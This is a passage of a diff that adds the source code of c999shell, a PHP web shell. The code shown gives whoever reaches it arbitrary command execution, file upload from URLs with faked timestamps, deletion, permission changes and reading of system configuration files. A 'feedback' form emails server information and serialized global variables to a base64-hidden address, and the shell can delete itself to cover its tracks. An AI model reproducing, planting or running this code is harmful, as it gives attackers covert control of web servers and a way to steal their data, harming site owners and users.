+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c999fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
